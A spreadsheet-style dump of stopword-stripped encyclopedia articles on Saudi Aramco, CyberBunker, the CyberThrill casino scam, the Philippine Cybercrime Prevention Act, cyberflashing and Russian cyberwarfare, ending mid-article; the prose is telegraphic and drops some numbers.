20%, lukoil, second sinopec, third repsol.: 228–232 2004, aramco producing million barrels (mbpd) potential mbpd. 2005, aramco launched five-year plan spend us$50 billion increase daily capacity 12.5 mbpd increasing production refining capacity doubling number drilling rigs.: 241–242 2005, saudi aramco world's largest company estimated market value us$781 billion.in june 2008, response crude prices exceeding us$130 barrel, aramco announced would increase production million barrels (mbpd). then prices plummeted, aramco stated january 2009, would reduce production mbpd.: 265–267 2011, saudi aramco started production karan field, output million day.in january 2016, deputy crown prince saudi arabia, mohammad salman saud, announced considering listing shares state-owned company, selling around order build large sovereign wealth fund.on april 2017, saudi security forces thwarted attempted attack aramco distribution center involving unmanned boat yemen.the wall street journal reported september 2018, aramco considering us$1 billion venture-capital fund invest international technology firms.in june 2019, report financial times claimed aramco bearing ministry-related expenses; boosting finance ministry budget allocation. also included energy minister khalid falih’s company-related diplomatic trips, well stays luxurious hotels. however, ally mentioned falih’s policies delivered additional revenues exceeded expenses.in september 2019, saudi arabia appointed yasir al-rumayyan chairman aramco. al-rumayyan became head country’s sovereign wealth fund replacing khalid al-falih, holding position since 2015. 2012 cyber attack aramco computers attacked virus august 2012. following aramco announced none infected computers part network directly tied production, company would soon resume full operations. hackers claimed responsibility spread computer virus. virus companies within energy sectors. group named "cutting sword justice" claimed responsibility attack 30,000 saudi aramco workstations, causing company spend months restoring services. group later indicated shamoon virus used attack. attack, main site aramco went message came home page apologizing customers. computer security specialists said "the attack, known shamoon, said least organization" sector. shamoon capable wiping files rendering several computers network unusable." richard clarke suggests attack part iran's retaliation involvement stuxnet. security researcher chris kubecka, helped company establish security attack, detailed level sophistication black 2015 presentation episode darknet diaries. 2019 drone attack september 2019, drone attack saudi aramco plants: abqaiq processing facility khurais field. houthi rebels claimed responsibility attack. attack million barrels (bpd) saudi crude output, world's supply. there discussions saudi arabian officials postponing aramco's ipo, attacks "sidelined half kingdom's output" oil. 2019 initial public offering (ipo) since around 2018, saudi arabia considering portion saudi aramco's ownership, onto public trading staged initial public offering (ipo), reduce cost government running company. while vetted major banks, delayed concerns aramco's corporate structure 2018 2019. september 2019 drone attacks aramco's facilities also delayed onset ipo.on april 2019, aramco issued bonds collectively valued us$12 billion. first international bond issue received us$100 billion orders foreign investors, breaks records bond issue emerging market entity.aramco announced sunday november 2019 plan list 1.5% value tadawul stock exchange.on november 2019, saudi aramco released 600-page prospectus giving details ipo. according specifications provided, 0.5% shares locked individual retail investors.on december 2019, saudi aramco priced offering saudi riyals (approximately us$8.53 time) share. company generated subscriptions total amount equals us$119 billion representing 456% total offer shares. raised us$25.6 billion ipo, making world's largest ipo, succeeding alibaba group 2014. company commenced trading tadawul december 2019, shares rising 35.2 riyals, giving company market capitalisation u$1.88 trillion, making saudi aramco world's largest listed company. global medium term note programme saudi aramco announced hiring international banks accomplish multi-tranche dollar-denominated bond issuance november 2020. announcement made company lookout cash following prices impact coronavirus crisis. according bourse filing made aramco, like goldman sachs, hsbc, morgan stanley, jpmorgan, capital hired company organizing investor calls prior planned transaction. document published banks said involved deal showed deal included paribas, mufg, bofa securities, smbc nikko, first dhabi bank, societe generale, international. aramco debt required cash worth us$37.5 billion dividends second half 2020 fund us$69.1 billion sabic’s acquisition paying installments 2028. 2020, company raised loan us$10 billion. company reported fall profit third-quarter november 2020, increased crude prices drop demand following covid-19 pandemic. 2020s march 2020 saudi aramco announced global partnership formula landing multi year deal.on june 2020, saudi aramco acquired share sabic, chemicals manufacturing company.in june 2020, saudi aramco laid nearly 70,000 employees, global energy firms reduced workforce covid-19 pandemic. most workers lost aramco foreigners.on july 2020, saudi aramco lost title world’s largest listed company market capitalization apple.on august 2020, saudi aramco reported fall income first half financial year, demand prices continued fall coronavirus crisis.on november 2020, saudi aramco reported 44.6% drop third-quarter profit coronavirus crisis continued choke demand weigh crude prices.on december 2020, saudi state announced tanker carrying 60,000 metric tons unleaded gasoline aramco refinery yanbu, attacked smaller boat rigged explosives.on march 2021, aramco refinery attacked bomb-laden drones. attack, claimed houthi rebels, started fire caused injuries damage, according official saudi press agency.on march 2021, saudi aramco signed agreement secure china's energy supplies next years, also develop technologies combat climate change. more recently, signed deal consortium eig.in july 2021, saudi aramco appointed former hsbc holdings chief executive officer stuart gulliver company's board directors.in october 2021, saudi aramco announced plans achieve net-zero carbon emissions wholly-owned operations 2050.on november 2021, houthi fighters took credit launching drones military targets riyadh, abha, jizan, najran, jeddah, aramco's refineries jeddah.in 2021, guardian reported aramco trying diversify rate companies, shell rather, aramco announced 2021 company intended increase crude capacity barrels barrels 2027.in february 2022, following crude's ascent nearly barrel, saudi arabia's aramco boosted prices clients asia, united states, europe.in march 2022, houthis fighters aramco's storage site jeddah, causing fire storage tanks. august 2022, saudi aramco announced would acquire valvoline's petroleum unit $2.65 billion. operation saudi aramco headquartered dhahran, operations span globe include exploration, production, refining, chemicals, distribution marketing. activities company monitored saudi arabian ministry petroleum mineral resources together supreme council petroleum minerals. however, ministry much responsibility regard council. board directors yasir othman al-rumayyan (chairman), member council economic development affairs (saudi arabia) ibrahim abdulaziz al-assaf, former minister foreign affairs minister finance mohammed al-jadaan, current minister finance mohammad al-tuwaijri, former minister economy planning nabil al-amoudi, former minister transport mark moody-stuart, former chairman anglo american, hsbc, foundation united nations global compact andrew liveris, former chairman chemical lynn elsenhans, former chairwoman sunoco peter cella, former president chevron philips chemical mark weinberger, former chairman ernst young amin nasser, president saudi aramco exploration significant portion saudi aramco workforce consists geophysicists geologists. saudi aramco exploring reservoirs since 1982. most process takes place expec advanced research center. originally, saudi aramco used cray supercomputers (cray-1m) expec advanced research center (ecc) assist processing colossal quantity data obtained exploration 2001, decided linux clusters replacement decommissioned cray systems. installed supercomputing system late 2009 disk storage capacity 1,050 terabytes (i.e, exceeding petabyte), largest storage installation saudi aramco's history support exploration frontier areas sea. refining chemicals while company originally plan refining oil, saudi government wished company dealing production. therefore, july 1993, government issued royal decree merging saudi aramco samarec, country's refining company. following year, saudi aramco subsidiary acquired equity interest petron corporation, largest crude refiner marketer philippines. since then, saudi aramco taken responsibility refining distributing country. 2008, saudi aramco sold entire stake ashmore group, london-listed investment group. ashmore acquired additional made required tender offer shareholders. july 2008, ashmore, refinery holdings b.v., 50.57% petron's stock. ashmore's payment made december 2008. december 2008, ashmore acquired pnoc's stake. month, miguel corporation (smc) said final stages negotiations ashmore group 50.1% petron. 2010, acquired majority control petron corporation. currently, saudi aramco's refining capacity million barrels (860,000 m3/d) (international joint equity ventures: 2,500 mbbl/d (400,000,000 m3/d), domestic joint ventures: 1,900 mpbd, wholly owned domestic operations: 1,000 mbbl/d (160,000,000 m3/d).)saudi aramco's downstream operations shifting emphasis integrate refineries petrochemical facilities. their first venture petro rabigh, joint venture sumitomo chemical began 2005 coast sea. order become global leader chemicals, aramco acquire royal dutch shell's stake refiner saudi arabia us$631 million. list refineries list domestic refineries: jazan refinery terminal projects (jrtp) (400,000 bbl/d (64,000 m3/d)), jazan construction ongoing. jeddah refinery (78,000 bbl/d (12,400 m3/d)) jeddah converted product storage terminal november 2017. tanura refinery (550,000 bbl/d (87,000 m3/d)) (includes crude distillation unit, condensate unit, hydrocracker, catalytic reforming) saudi aramco jubail refinery (sasref), jubail (305,000 bbl/d (48,500 m3/d)) riyadh refinery (126,000 bbl/d (20,000 m3/d)) yanbu refinery (245,000 bbl/d (39,000 m3/d))list domestic refining ventures: saudi aramco mobil refinery ltd. (samref), yanbu (400,000 bbl/d (64,000 m3/d)) petro rabigh, rabigh (400,000 bbl/d (64,000 m3/d)) saudi aramco base (luberef) saudi aramco total refining petrochemical (satorp), jubail (400,000 bbl/d (64,000 m3/d)) yanbu aramco sinopec refinery (yasref), yanbu (400,000 bbl/d (64,000 m3/d))list international refining ventures: fujian refining petrochemical (frpc), people's republic china sinopec senmei (fujian) petroleum ltd. (sspc), people's republic china motiva enterprises llc, united states, port arthur texas 635,000 bbl/d (101,000 m3/d) showa shell, japan 445,000 bbl/d (70,700 m3/d) s-oil, republic korea 669,000 bbl/d (106,400 m3/d) saudi refining inc., united states reliance industries, investment) indiasaudi aramco point exploring projects pakistan, including billion refinery project gwandar since cancelled. 2022 revealed saudi aramco creating joint venture north huajin chemical industries group create company called huajin aramco petrochemical company would develop 300,000 refining facility ethylene steam cracking capabilities. shipping saudi aramco employed several tankers ship crude oil, refined oil, natural various countries. used created subsidiary company, vela international marine, merged bahri company, handle shipping north america, europe, asia. stakeholder king salman global maritime industries complex, shipyard largest world complete. global investment saudi aramco expanded presence worldwide include three major global energy markets asia, europe, north america. april 2019, aramco signed deal acquire stake south korean refiner hyundai oilbank us$1.24 billion. moreover, april 2019, aramco signed agreement poland’s leading refiner orlen supply arabian crude oil. liquefied natural aramco planning major producer liquefied natural (lng) world. sold first cargo singapore indian buyer. company looking globally potential joint ventures partnerships achieve goal regarding market. saudization original concession agreement included article al-naimi pointed out, "key building block shaping saudi society decades come." reads, "the enterprise contract shall directed supervised americans shall employ saudi nationals practicable, company find suitable saudi employees employ nationals." first company school started 1940 al-khobar home hijji jassim, company interpreter, translator first instructor. al-naimi pointed out, "from beginning, development aramco directly tied betterment saudi arabia." another school located dhahran 1941, called jebel school. boys hired entry-level positions attended four hours, followed four hours work afternoon. 1950, aramco built schools 2,400 students. 1959, aramco sent first group saudi students college states. 1970, aramco started hiring first high school graduates, 1979 started offering college scholarships. 1965, zafer husseini named first saudi manager 1974, faisal al-bassam named first saudi vice president. early students al-naimi, named first saudi president aramco nov. 1983. al-naimi states, "the company committed developing qualified saudis become fully educated trained industry professionals." al-naimi acknowledged thomas barger's championing saudization, "you, aramco's leaders, greatest vision supported training effort saudi arab employees early days. that visionary support effort bearing fruit many executive positions filled saudis effort." 1943, 1,600 saudis employed aramco, 1987, nearly two-thirds aramco's 43,500 strong workforce saudis. 1988, al-naimi became hisham nazer became chairman, first saudis hold positions. "pinnacle saudization" occurred shaybah field came line july 1998, three-year effort team consisting saudis. aramco 2016 still maintained expatriate workforce 15%, aramco can, words al-naimi, sure getting access latest innovations technical expertise."saudi aramco emitted 59.26 billion tonnes carbon dioxide equivalent since began operations, accounting 4.38% worldwide anthropogenic emissions since 1965.in letter sent nine international banks reportedly hired aramco assist arranging us$2 trillion market debut, environmental groups warned listing causing highly possible hindrance effort reduce greenhouse emissions human rights abuses committed saudi regime.on november 2019, saudi aramco joined world bank's initiative reduce flaring zero 2030. firm reported flaring less total production first half 2019. controversies 2007 haradh pipeline explosion november 2007, reports came natural pipeline explosion taken lives several workers, death toll later determined aramco asserts purely maintenance-related incident. organizational culture december 2020, financial times published article engineer, whose family claims saudi aramco negligent handling covid-19 infection. according family, asking company authorities help, three weeks death, simply asked keep gloves mask saudi aramco formally contact approximately hours death, refused release body, allegedly erased information mobile phone. grieving family without financial support almost five months, received $400,000 benefits, back insurance financial times started asking questions. article, five whistleblowers accuse aramco bullying mismanagement. former employee expressed concerns company’s highly dangerous failure pressure-test valves mains units, detailing cracks refinery structure sinking roads foundations. refinery runs real risk becoming aramco's piper alpha, said another expatriate employee, also accuses aramco lacking culture challenge, facilitating ineptitude laziness. treatment workers march 2020, saudi aramco came fire photos migrant worker dressed large hand-sanitizer dispenser went viral social media. people twitter condemned "modern-day slavery," "humiliating" "dehumanizing." according company, display organized without approval aramco officials. strong-arming investors 2019, sources told financial times wealthy families saudi arabia coerced joining saudi aramco ipo. according analysts, aramco could realistically reach market capitalization $1.5 trillion saudis wanted trillion. oddly, many signed relatives part 2017–2019 saudi arabian purge. according four sources, saudi government "strong-armed", "coerced" "bullied" wealthiest families kingdom becoming cornerstone investors. human rights saudi aramco's majority shareholder government saudi arabia, human rights matter concern. saudi arabia abstained united nations vote adopting universal declaration human rights, saying contradicted sharia law. country holds reservation convention rights child provisions conflict sharia law. government accused routinely using torture violently oppressing critics, women, along social groups. also references bibliography vitalis, robert (2006). america's kingdom: mythmaking saudi frontier. stanford: stanford university press. isbn 978-0-8047-5446-0. external links site aramco services saudi aramco's subsidiary report security saudi arabia. much saudi aramco security. saudi arabia's crude production chart (1980-2004) data sourced department energy minutes (2008-12-07) "the kingdom: part one". minutes (2008-12-07) "the kingdom: part two".</t>
  </si>
  <si>
    <t>CyberBunker</t>
  </si>
  <si>
    <t>cyberbunker internet service provider located netherlands germany that, according website, hosted "services site "except child pornography anything related terrorism". company operated first former nato bunker zeeland, later another former nato bunker traben-trarbach, germany. cyberbunker served host pirate many wikileaks mirrors. cyberbunker also accused host spammers, botnet command-and-control servers, malware online scams. company also involved border gateway protocol hijacks addresses used spamhaus united states department defense. spamhaus hijack part exceptionally large distributed denial service attack launched march 2013. because size attack received considerable mainstream media attention. company named initial location former cold bunker. 2013, cyberbunker listed address bunker, location cyberbunker's servers unclear.in september 2019, german police stormed shut company's operations bunker traben-trarbach. seven suspects arrested. history dutch bunker (cb-1) 1995, herman-johan xennt bought 20,000 square foot bunker outside small town kloetinge south netherlands, formerly used nato. built 1955. bunker, originally used wartime provincial military command center (dutch: provinciaal militair commando) dutch military, built withstand nuclear attack. bunker de-assessed dutch military 1994.with collaborators, xennt formed cyberbunker company within bunker, offer "bulletproof hosting" sites. company's customers 1990s consisted largely pornography sites. policy accept site except related child pornography terrorism.in 2002, fire broke dutch bunker. after fire out, discovered besides internet hosting services, mdma laboratory operation. three four charged operation convicted three-year prison sentences; fourth acquitted lack evidence. following fire local town denied company business license, resulting cyberbunker servers moved above-ground locations, including amsterdam.in publicity, company continued claim operated bunker. march 2013, secure data storage company bunkerinfra issued press release stating owners kloetinge bunker since 2010, claims made cyberbunker regarding continued usage complex false, operating bunker since fire 2002. businessweek reported stating bunker "full junk" acquired quoted guido blaauw, general manager, stating cyberbunker publicity material "all photoshop". pirate october 2009 bittorrent tracker pirate bay, subjected legal action various anti-piracy groups including dutch copyright organisation brein, moved away sweden cyberbunker. 2010 hamburg district court ruled cyberbunker, operating germany cb3rob longer allowed host pirate bay, subject €250,000 fine years imprisonment infringement. spamhaus october 2011, spamhaus identified cyberbunker providing hosting spammers contacted upstream provider, a2b, asking service cancelled. initially refused, blocking single address linked spamming. spamhaus responded blacklisting address space. capitulated, dropping cyberbunker, filed complaints dutch police spamhaus extortion.in march 2013, spamhaus added cyberbunker blacklist. shortly afterwards distributed denial service (ddos) attack previously unreported scale (peaking gbit/s; average large-scale attack often around gbit/s, largest known previously publicly reported attack gbit/s) launched spamhaus email servers using domain name system (dns) amplification attack; march 2013 attack lasted week. steve linford, chief executive spamhaus, said withstood attack. other companies, google, made resources available help absorb traffic. attack investigated five different national cyber-police-forces around world. spamhaus alleged cyberbunker, cooperation "criminal gangs" eastern europe russia behind attack; cyberbunker respond bbc's request comment allegation.cloudflare, internet security firm located francisco, california assisting spamhaus combating attack also targeted. march 2013, cyberbunker's website went offline short period time, possibly becoming victim ddos attack themselves.on april 2013 sven olaf kamphuis, vocal spokesman cyberbunker, arrested request dutch authorities near barcelona spanish police collaboration eurojust. anonymous press release uploaded pastebin.com following demanding release kamphuis threatened large-scale attacks remain custody. spanish authorities reported kamphuis operated well-equipped bunker used mobile computing office. information bunker provided. september 2013 revealed second arrest made april relation spamhaus attack, suspect 16-year-old london. kamphuis held days awaiting extradition netherlands later found guilty sentenced days prison. sentence suspended, credit days served. traben-trarbach bunker (cb-3) 2013 company purchased second bunker, traben-trarbach, germany. early 2015, german cybercrime investigators received warrant investigate company tapping internet traffic bunker. during time, company's clients claimed included dark marketplaces wall street market, cannabis road flugsvamp, well fraudsters, forum exchanging illegal drugs, counterfeit money fake identification. george mitchell approached xennt running encrypted phone business.in september 2019, german police raided bunker. seven people arrested raid. police later said bunker location late 2016 denial service attack deutsche telekom launched. references</t>
  </si>
  <si>
    <t>CyberThrill</t>
  </si>
  <si>
    <t>cyberthrill first now-defunct online casinos, gained notoriety largest organised international sponsorship (and gambling) frauds, serving program. formed 1997 located nassau, bahamas, company represented canadian firm internet entertainment enterprises, inc. (based montreal, quebec, canada) also handled casino's marketing banner advertising program. online casino eventually taken offline time late 2000-early 2001 disgruntled webmasters fallen victim scam. former location cyberthrill cyberthrill.com, today driven parked domain. history program foremost methods website revenue late 1990s, website owners used enroll cyberthrill's serving program display banners websites, similar contemporary adsense program google). cyberthrill program exclusively send gamblers casino website. program administered per-click basis. reason behind cyberthrill's popularity claims above-average $0.20 click-through. many webmasters joined program brought traffic online casino, paid. cyberthrill occasionally would send small, first check $10) 'show' legitimacy program. however, user's account reached excess $100, casino would withhold payment simply terminated contract webmaster, claims cyberthrill's terms breached.though click fraud rampant case adsense serving programs), many webmasters nonetheless earned clicks fairly, still cheated casino. online casino eventually destroyed time late 2000-early 2001 attack webmasters scammed program. mungabunga, owner hackology.co, created javascript program registered millions fake accounts cyberthrill database, overloaded company's servers prevented members registering. other cheated webmasters participated attack. also adsense references external links webmasters slam casino cyber scam review</t>
  </si>
  <si>
    <t>Cyberattacks on Ukraine</t>
  </si>
  <si>
    <t>cyberattacks ukraine refer 2015 ukraine power grid hack 2017 ukraine ransomware attacks 2022 ukraine cyberattacks</t>
  </si>
  <si>
    <t>Cybercrime Prevention Act of 2012</t>
  </si>
  <si>
    <t>cybercrime prevention 2012, officially recorded republic 10175, philippines approved september 2012. aims address legal issues concerning online interactions internet philippines. among cybercrime offenses included bill cybersquatting, cybersex, child pornography, identity theft, illegal access data libel.while hailed penalizing illegal acts done internet covered laws, criticized provision criminalizing libel, perceived curtailment freedom expression—"cyber authoritarianism". journalists like maria ressa, rappler, drawn international condemnation.on october 2012, supreme court philippines issued temporary restraining order, stopping implementation days, extended february 2013 "until orders court."on february 2014, supreme court upheld sections law, including controversial cyberlibel component. history cybercrime prevention 2012 first laws philippines specifically criminalizes computer crime, prior passage strong legal precedent philippine jurisprudence. while laws electronic commerce 2000 (republic 8792) regulated certain computer-related activities, laws provide legal basis criminalizing crimes committed computer general: example, onel guzman, computer programmer charged purportedly writing iloveyou computer worm, ultimately prosecuted philippine authorities lack legal basis charge existing philippine laws time arrest.the first drafts anti-cybercrime data privacy acts started 2001 legal regulatory committee former information technology ecommerce council ([itecc) forerunner commission information communication technology (cict) department information communications technology (dict) headed former secretary virgilio "ver" peña, legal regulatory committee chaired atty. claro parlade. creation laws initiative information security privacy sub-committee chaired albert dela cruz president philippine computer emergency response team (phcert), together anti-computer crime fraud division (accfd) chief, elfren meneses national bureau investigation (nbi). administrative operational functions provided presidential management staff (pms) acting cict secretariat. initial version] communicated various organizations special interest groups time. this superseded several cybercrime-related bills filed 14th 15th congress. cybercrime prevention ultimately product house bill 5808, authored representative susan yap-sulit second district tarlac co-authors, senate bill 2796, proposed senator edgardo angara. both bills passed respective chambers within june 2012, respectively, shortly impeachment renato corona, final version signed president benigno aquino september provisions act, divided sections split across eight chapters, criminalizes several types offense, including illegal access (hacking), data interference, device misuse, cybersquatting, computer-related offenses computer fraud, content-related offenses cybersex spam, offenses. also reaffirms existing laws child pornography, offense republic 9775 (the anti-child pornography 2009), libel, offense section revised penal code philippines, also criminalizing committed using computer system. finally, includes "catch-all" clause, making offenses currently punishable revised penal code also punishable committed using computer, severe penalties provided revised penal code alone. universal jurisdiction: provisions apply filipino nationals regardless place commission. jurisdiction also lies punishable either committed within philippines, whether erring device wholly partly situated philippines, whether damage done natural juridical person time commission within philippines. regional trial courts shall jurisdiction cases involving violations act. takedown clause included act, empowering department justice restrict and/or demand removal content found contrary provisions act, without need court order. this provision, originally included earlier iterations deliberated congress, inserted senate deliberations 2012. complementary takedown clause clause mandating retention data computer servers months date transaction, extended another months enforcement authorities request also mandates national bureau investigation philippine national police organize cybercrime unit, staffed special investigators whose responsibility exclusively handle cases pertaining violations act, supervision department justice. unit empowered among others, collect real-time traffic data internet service providers cause, require disclosure computer data within hours receipt court warrant service provider, conduct searches seizures computer data equipment. reaction received mixed reactions several sectors upon enactment, particularly provisions could potentially affect freedom expression, freedom speech data security philippines. local business process outsourcing industry received well, citing increase confidence investors measures protection electronic devices online data. media organizations legal institutions though criticized extending definition libel defined revised penal code philippines, criticized international organizations outdated: united nations remarked current definition libel defined revised penal code inconsistent international covenant civil political rights, therefore violates respect freedom expression.senator edgardo angara, main proponent act, defended saying legal framework protect freedoms freedom expression. asked act's critics wait bill's implementing rules regulations issues addressed. also added unlike controversial stop online piracy protect act. however, senator guingona criticized bill, calling prior restraint freedom speech freedom expression.the electronic frontier foundation also expressed concern act, supporting local media journalist groups opposed centre democracy also published detailed analysis criticizing freedom expression perspective.malacañang attempted distance law; guilty verdict rendered maria ressa cyberlibel case, presidential spokesman harry roque blamed president duterte's predecessor, noynoy aquino, negative effects law. constitutionality several petitions submitted supreme court questioning constitutionality act. october supreme court initially deferred action petitions, citing absence justices prevented court sitting banc. initial lack temporary restraining order meant went effect scheduled october protest, filipino netizens reacted blacking facebook profile pictures trending hashtag #notocybercrimelaw twitter. "anonymous" also defaced government websites, including bangko sentral pilipinas, metropolitan waterworks sewerage system intellectual property office.on october 2012, supreme court decided issue temporary restraining order, pausing implementation days. early december 2012, government requested lifting tro, denied. over four hours oral arguments petitioners heard january 2013, followed three-hour rebuttal office solicitor general, representing government, january 2013. this first time philippine history oral arguments uploaded online supreme court. disini secretary justice february 2014, supreme court ruled constitutional, although struck provisions, including ones violated double jeopardy. notably, likes "retweets" libelous content, originally also criminalized libel law, found legal. only justice marvic leonen dissented ruling, writing believes whole idea criminal libel unconstitutional.while motions reconsideration immediately filed numerous petitioners, including center media freedom responsibility, rejected april 2014. however, justice arturo brion, originally wrote separate concurring opinion, changed vote dissent reconsidering whether impose higher penalties cyberlibel regular libel. effects cyberlibel 2013, announced would seek drop online libel provisions law, well provisions "are punishable laws already", like child pornography cybersquatting. said would endorse revising 16th congress philippines, cyberlibel remains books crime philippines, charged prosecutors multiple times since then. senator tito sotto primarily responsible cyberlibel provision, added social media comments accusing plagiarism; defended authorship last minute amendment, asking reporters fair "just [bloggers] accountable law, angry me?" while libel crime philippines since american imperial period, cyberlibel penalty minimum medium prisión correccional (six months four years months), penalty prisión mayor (six twelve years).duterte's administration accused targeting journalists law, particular rappler. journalists charged cyberlibel since 2013 include ramon tulfo, nieto, maria ressa. online post even need public cases filed doj. roman catholic clergy also faced cyberlibel charges. even foreigners accused others accused cyberlibel charges. universal jurisdiction, required offender commit offense philippines; brought caregiver lived taiwan charges allegedly "posting nasty malevolent materials president duterte facebook".insults would seen countries minor prosecutors filing cyberlibel charges: "crazy"; "asshole"; "senile"; "incompetent".on march 2020, first guilty verdict cyberlibel case returned local politician, archie yongco, aurora, zamboanga sur. yongco found guilty falsely accusing another local politician murder-for-hire facebook post, deleted minutes later, archives made; court unconvinced denial posted message, sentenced eight years jail ordered damages ₱610,000 (us$12,175).a magna carta philippine internet freedom crowdsourced filipino netizens intent among things, repealing cybercrime prevention 2012; failed pass. several organizations continue fight decriminalization forms libel philippines, including national union journalists philippines vera files. also cyberbullying philippine copyright notes references external links "republic 10175—an defining cybercrime, providing prevention, investigation, suppression imposition penalties therefor purposes". official gazette republic philippines. office president philippines. september 2012. "disini secretary justice, oral arguments petitioners (january 2013) government (january 2013)". supreme court philippines. archived original april 2013.</t>
  </si>
  <si>
    <t>Cyberflashing</t>
  </si>
  <si>
    <t>cyberflashing crime singapore] involves sending obscene pictures strangers online, often done airdrop. term also apply action carried entirely bluetooth online services. initial usage first mainstream coinage term occurred around august 2015, female commuter airdropped pictures penis. case reported british transport police indicated pictures declined, insufficient data recorded receiving phone could provide suitable evidence. methodology prevention airdrop hybrid communication method bluetooth wi-fi. bluetooth passes communication radio waves. airdrop seeks potential communication partners bluetooth uses establish secure peer-to-peer "wi-fi channel" actual information passed—usually photographs, documents, videos.an appropriately equipped device seek active peers within meters. harassing individual make initial connection device open users. photo sent preview photo shown device's owner time request allow connection. therefore, harassment (the "flashing") occur specific connection authorized.prevention requires reverting iphone's default conditions either turn airdrop allow connections contacts. police forces suggested pushing airdrop program automatic reversion condition time configured open access.if harassing photographs received, keeping allows victim provide much greater information cybercrime units police. however, cause issue effective methods catching cyber-flashers risk causing additional harassment pain victims. additional incidents frequency crime difficult assess significantly stronger anecdotal evidence indicated crime figures. august 2017, york post reported least women sent nude pictures commuting. huffpost reporter also sent sexual pictures commuting. this case reported british transport police, news stories published, several women indicated publications suffered similar harassment. however, police forces indicate complaints actions despite growing awareness" occurring. this indicates wide level under-reporting thus arrests prosecutions.in australia, 2018, reported cyber-flashing increasingly common prank used children, popular ease targeting multiple individuals rapidly fairly unidentifiable fashion.in israel, 2022, anadolujet flight aborted takeoff gurion airport pictures airplane crashes distributed among passengers airdrop. legal issues technological-based abuses, deepfake pornography, revenge porn, upskirting, specific pre-existing designed criminalize prevent cyber-flashing. this means many police forces required fall back generalized crimes harassment outraging public decency.in south wales, australia, crimes amendment (intimate images) bill 2017 implemented make offense "intentionally record distribute, threaten record distribute, intimate image person without consent". this legislation would cover cyber-flashing prohibition distributing intimate images without consent. criticism "upskirting laws" consideration would cover cyber-flashing, well forms image-based abuse, revenge porn. proposed laws also stronger intent prohibition, unclear whether would cover non-harassment circumstances well issues receiver images consented "image subject" has.in singapore, cyberflashing, upskirt photography, revenge porn criminalized since 2019. also dick exhibitionism harassment sexting references</t>
  </si>
  <si>
    <t>Cyberwarfare by Russia</t>
  </si>
  <si>
    <t>cyberwarfare russia includes denial service attacks, hacker attacks, dissemination disinformation propaganda, participation state-sponsored teams political blogs, internet surveillance using sorm technology, persecution cyber-dissidents active measures. according investigative journalist andrei soldatov, activities coordinated russian signals intelligence, part formerly part 16th department. analysis defense intelligence agency 2017 outlines russia's view "information countermeasures" (informatsionnoye protivoborstvo) "strategically decisive critically important control domestic populace influence adversary states", dividing 'information countermeasures' categories "informational-technical" "informational-psychological" groups. former encompasses network operations relating defense, attack, exploitation latter "attempts change people's behavior beliefs favor russian governmental objectives." online presence journalist pete earley described interviews former senior russian intelligence officer sergei tretyakov, defected united states 2000: sergei would send officer branch york public library could access internet without anyone knowing identity. officer would post propaganda various websites send emails publications broadcasters. some propaganda would disguised educational scientific reports. studies generated center russian experts. reports would 100% accurate tretyakov specify targeted sites, made clear selected sites convenient distributing specific information. according him, work york city 1990s, frequent subjects chechnya.according publication russian computer weekly computerra, "just became known anonymous editors editing articles english wikipedia interests intelligence security services, also likely russian security services involved editing russian wikipedia, even interesting prove everyone knows security bodies special place structure [russian] state" cyberattacks claimed russian security services organized number denial service attacks part cyber-warfare countries, 2007 cyberattacks estonia 2008 cyberattacks russia, south ossetia, georgia, azerbaijan. identified young russian hacker said paid russian state security services lead hacking attacks nato computers. studying computer sciences department defense information. tuition paid fsb. estonia april 2007, following diplomatic russia soviet memorial, estonia targeted series cyberattacks financial, media, government websites taken enormous volume spam transmitted botnets called distributed denial-of-service attack. online banking made inaccessible, government employees suddenly unable communicate e-mail, media outlets could distribute news. attacks reportedly came russian addresses, online instructions russian, estonian officials traced systems controlling cyberattacks back russia. however, experts held doubts attacks carried russian government itself. year attack nato founded cooperative cyber defence centre excellence tallinn direct consequence attacks. france 2015, paris-based french broadcasting service tv5monde attacked hackers used malicious software attack destroy network's systems take twelve channels air. attack initially claimed group calling "cyber caliphate" however in-depth investigation french authorities revealed attack network links apt28, gru-affiliated hacker group. 2017, french presidential election, 20,000 e-mails belonging campaign emmanuel macron dumped anonymous file-sharing website, shortly campaign announced hacked. word leak spread rapidly internet, facilitated bots spam accounts. analysis flashpoint, american cybersecurity firm, determined "moderate confidence" apt28 group behind hacking subsequent leak.in february 2021 agence nationale sécurité systèmes d'information said "several french entities" breached sandworm late 2017 2020 hacking french software company centreon deploy malware. similar 2020 united states federal government data breach. anssi said breach "mostly affected information technology providers, especially hosting providers." russia denied behind cyberattack. centreon said statement "has taken note information" disputed breach linked vulnerability commercial software. georgia july 2008, website georgian president, mikheil saakashvili, rendered inoperable twenty-four hours series denial service attacks. shortly after, website national bank georgia parliament attacked hackers plastered images mikheil saakashvili former nazi leader adolf hitler. during war, many georgian government servers attacked brought down, reportedly hindering communication dissemination crucial information. according technical experts, first recorded instance history cyberattacks coinciding armed conflict.an independent us-based research institute cyber consequences unit report stated attacks "little direct involvement russian government military". according institute's conclusions, several attacks originated multiple users located russia, ukraine latvia. these users willingly participating cyberwarfare, supporters russia 2008 south ossetia war, attacks also used botnets. germany 2015, high-ranking security official stated "highly plausible" cybertheft files german parliamentary committee investigating spying scandal, later published wikileaks, conducted russian hackers. late 2016, bruno kahl, president bundesnachrichtendienst warned data breaches misinformation-campaigns steered russia. according kahl, insights cyberattacks occur purpose create political uncertainty. süddeutsche zeitung reported february 2017 year-long probe german intelligence "found concrete proof [russian] disinformation campaigns targeting government". 2020 however german investigators collected enough evidence identify suspect.hans-georg maaßen, head country's federal office protection constitution, noted "growing evidence attempts influence [next] federal election" september 2017 "increasingly aggressive cyber espionage" political entities germany. york times reported september 2017, three days german federal election, little suggest russian interference election. 2021 european commission accused russia trying interfere european democratic processes days parliamentary election september germany. kyrgyzstan beginning mid-january 2009, kyrgyzstan's main isps came large-scale ddos attack, shutting websites e-mail within country, effectively taking nation offline. attacks came time country's president, kurmanbek bakiyev, pressured domestic actors russia close u.s. base kyrgyzstan. wall street journal reported attacks carried russian "cyber-militia". poland three-year pro-russian disinformation campaign facebook audience million poles discovered early 2019 oko.press avaaz. campaign published fake news supported three polish pro-russian politicians websites: adam andruszkiewicz, former leader ultra-nationalist neo-fascist all-polish youth and, 2019, secretary state polish ministry digitisation; janusz korwin-mikke; leszek miller, active member polish united workers' party communist epoch prime minister poland post-communist epoch. facebook responded analysis removing pages. romania between late april early 2022, midst 2022 russian invasion ukraine, multiple romanian government, military, bank mass media websites taken series ddos attacks, behind pro-kremlin hacking group, killnet. hacking group described cyberattacks response statement made then-senate president, florin cîțu romania would provide ukraine military equipment. south korea according united states intelligence officials talked washington post, also findings cybersecurity analyst michael matonis, russia likely behind 